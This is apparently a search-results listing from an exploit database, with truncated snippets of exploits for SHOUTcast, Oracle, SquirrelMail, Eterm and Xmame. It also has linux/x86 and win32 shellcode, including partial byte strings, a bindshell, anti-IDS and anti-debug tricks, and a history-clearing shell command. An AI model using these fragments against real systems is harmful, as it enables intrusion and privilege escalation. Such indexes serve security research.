5626 matches found
SHOUTcast <= 1.9.4 File Request Format String Exploit (Leaked)
No description provided by source. / Shoutcast = 1.9.4 exploit by crash-x Trys to upload the shellcode to a fixed address and execute it. This exploit was not written bei Simon 'Zodiac' Moser segfault.ch. / include stdio.h include stdlib.h include stdarg.h include string.h include sys/types.h...
SHOUTcast 1.9.4 - File Request 'Leaked' Format String
/ Shoutcast include include include include include include include include include include include define SHELLPORT 7000 define SHELLCOMMAND "unset HISTFILE; uname -a; id;" if 1 unsigned char shellcode = / bindshell 7000 Unknown /...
Oracle Database Server 9i10g - XML Local Buffer Overflow
Oracle Database Server 9i10g - XML Local Buffer Overflow / Argeniss - Information Security http://www.argeniss.com infoatdotatdotc:\Unbreakable.txt' FROM DUAL; / Argeniss - Information Security http://www.argeniss.com infoatdotatdotcom Oracle version: 10g Release 1 Platform: Linux Shellcode opens...
linux/x86 -execve /bin/sh anti-ids 40 bytes
linux/x86 execve /bin/sh anti-ids 40 bytes. Shellcode exploit for linx86 platform / N Shell : shellcodez Arch:x86 Platform:linux Size:40 Description: The shellcode to execute /bin/sh; This shellcode is anti-ids It not containz encoding engine but it not contain standart signatures as: "\xcd\x80"...
Oracle Database Server 9i/10g - 'XML' Local Buffer Overflow
/ Argeniss - Information Security http://www.argeniss.com infoatdotatdotc:\Unbreakable.txt' FROM DUAL; / Argeniss - Information Security http://www.argeniss.com infoatdotatdotcom Oracle version: 10g Release 1 Platform: Linux Shellcode opens a shell on port 4444 from www.metasploit.com. / DECLARE ...
Oracle Database Server 9i/10g (XML) Buffer Overflow Exploit
Exploit for unknown platform in category local exploits =========================================================== Oracle Database Server 9i/10g XML Buffer Overflow Exploit =========================================================== / Argeniss - Information Security http://www.argeniss.com...
linux/x86 execve /bin/sh anti-ids 40 bytes
Exploit for linux/x86 platform in category shellcode ========================================== linux/x86 execve /bin/sh anti-ids 40 bytes ========================================== / N Shell : shellcodez Arch:x86 Platform:linux Size:40 Description: The shellcode to execute /bin/sh; This shellcod...
SquirrelMail 3.1 - Change Passwd Plugin Local Buffer Overflow
SquirrelMail 3.1 - Change Passwd Plugin Local Buffer Overflow / Change passwd 3.1 SquirrelMail plugin Coded by rod hedor web-- http://lezr.com local exploit Multiple buffer overflows are present in the handling of command line arguements in chpasswd. The bug allows a hacker to exploit the process...
linux/x86 - execve /bin/sh xored for Intel x86 CPUID 41 bytes
linux/x86 execve /bin/sh xored for Intel x86 CPUID 41 bytes. Shellcode exploit for linx86 platform / linux/x86 execve"/bin/sh", "/bin/sh", NULL / xor'ed against Intel x86 CPUID - 41 bytes The idea behind this shellcode is to use a weak pre-shared secret between the attacker and the attacked...
linux/x86 - execve /bin/sh encoded by +1 39 bytes
linux/x86 execve /bin/sh encoded by +1 39 bytes. Shellcode exploit for linx86 platform / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik / char shellcode = "\x68\x8a\xe2\xce\x81" // push $0x81cee28a "\x68\xb1\x0c\x53\x54" // push $0x54530cb1 "\x68\x6a\x6f\x8a\xe4" /...
linux/x86 execve /bin/sh (encoded by +1) 39 bytes
No description provided by source. / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik [email protected] / char shellcode = "\x68\x8a\xe2\xce\x81" // push $0x81cee28a "\x68\xb1\x0c\x53\x54" // push $0x54530cb1 "\x68\x6a\x6f\x8a\xe4" // push $0xe48a6f6a...
linux/x86 execve /bin/sh xored for Intel x86 CPUID 41 bytes
No description provided by source. / linux/x86 execve"/bin/sh", "/bin/sh", NULL / xor'ed against Intel x86 CPUID - 41 bytes The idea behind this shellcode is to use a weak pre-shared secret between the attacker and the attacked machine. So if a 3rd party side would try to run this shellcode and...
linux/x86 execve /bin/sh xored for Intel x86 CPUID 41 bytes
Exploit for linux/x86 platform in category shellcode =========================================================== linux/x86 execve /bin/sh xored for Intel x86 CPUID 41 bytes =========================================================== / linux/x86 execve"/bin/sh", "/bin/sh", NULL / xor'ed against...
win32/xp sp2 Pop up message box 110 bytes
win32/xp sp2 Pop up message box 110 bytes. Shellcode exploit for win32 platform / Author : Omega7 Assembly Code : Steve Hanna Changed by : Omega7 Description : It is 110 Byte Shellcode which Pops up Message Box Under Windows Xp SP2 If you Want to use it in any other Windows You need to change the...
Eterm LibAST < 0.7 - '-X' Option Privilege Escalation
// eterm by default isn't setuid but there is a lot of instances where // it needs setuid root/utmp to run different options. /str0ke / Copyright ©Rosiello Security 2006 URL: http://www.rosiello.org Author: Johnny Mast e-mail: [email protected] This program is free software; you can redistribute ...
win32/xp sp2 Pop up message box 110 bytes
Exploit for win32 platform in category shellcode ========================================= win32/xp sp2 Pop up message box 110 bytes ========================================= / Author : Omega7 Assembly Code : Steve Hanna Changed by : Omega7 Description : It is 110 Byte Shellcode which Pops up...
Xmame 0.102 - -pb-lang-rec Local Buffer Overflow
Xmame 0.102 - -pb-lang-rec Local Buffer Overflow / xmame-expl.c by sj [email protected] On 20th of Jan it came to my attention that Xmame suffered from several buffer overflow problems. Thinking this issue was resolved, I installed Xmame on my Ubuntu laptop, from the Ubuntu repositories which installed...
linux/x86 execve(/bin/sh) / PUSH - 23 bytes
Exploit for linux/x86 platform in category shellcode =========================================== linux/x86 execve/bin/sh / PUSH - 23 bytes =========================================== / linux/x86 execve"/bin/sh", "/bin/sh", NULL / PUSH - 23 bytes - izik / char shellcode = "\x6a\x0b" // push $0xb...
linux/x86 Adduser without Password to /etc/passwd 59 bytes
linux/x86 Adduser without Password to /etc/passwd 59 bytes. Shellcode exploit for linx86 platform / linux/x86 adds user 'xtz' without password to /etc/passwd - 59 bytes - izik / char shellcode = "\x6a\x05" // push $0x5 // // : // "\x58" // pop %eax "\x99" // cltd "\x31\xc9" // xor %ecx,%ecx...
linux/x86 anti-debug trick INT 3h trap + execve /bin/sh 39 bytes
linux/x86 anti-debug trick INT 3h trap + execve /bin/sh 39 bytes. Shellcode exploit for linx86 platform / linux/x86 anti-debug trick INT 3h trap + execve"/bin/sh", "/bin/sh", NULL, NULL - 39 bytes The idea behind a shellcode w/ an anti-debugging trick embedded in it, is if for any reason the IDS...